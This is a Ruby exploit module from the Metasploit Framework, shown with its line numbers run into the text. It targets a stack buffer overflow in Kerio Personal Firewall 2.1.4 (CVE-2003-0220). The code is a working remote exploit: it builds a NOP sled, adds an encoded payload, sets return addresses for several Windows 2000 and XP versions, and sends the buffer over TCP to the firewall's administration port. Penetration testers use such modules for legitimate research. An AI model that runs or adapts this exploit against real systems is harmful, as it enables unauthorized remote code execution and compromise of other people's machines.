Path: blob/master/modules/exploits/windows/firewall/kerio_auth.rb
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = AverageRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(update_info(info,12'Name' => 'Kerio Firewall 2.1.4 Authentication Packet Overflow',13'Description' => %q{14This module exploits a stack buffer overflow in Kerio Personal Firewall15administration authentication process. This module has only been tested16against Kerio Personal Firewall 2 (2.1.4).17},18'Author' => 'MC',19'License' => MSF_LICENSE,20'References' =>21[22['CVE', '2003-0220'],23['OSVDB', '6294'],24['BID', '7180']25],26'DefaultOptions' =>27{28'EXITFUNC' => 'process',29},30'Payload' =>31{32'Space' => 800,33'BadChars' => "\x00",34'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",35},36'Platform' => 'win',37'Targets' =>38[39[ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x7c2ec68b } ],40[ 'Windows XP Pro SP0 English', { 'Ret' => 0x77e3171b } ],41[ 'Windows XP Pro SP1 English', { 'Ret' => 0x77dc5527 } ],42],43'Privileged' => true,44'DisclosureDate' => '2003-04-28',45'DefaultTarget' => 0))4647register_options(48[49Opt::RPORT(44334)50])51end5253def exploit54connect5556print_status("Trying target #{target.name}...")5758sploit = make_nops(4468) + payload.encoded59sploit << [target.ret].pack('V') + [0xe8, -850].pack('CV')6061sock.put(sploit)62sock.get_once(-1, 3)6364handler65disconnect66end67end686970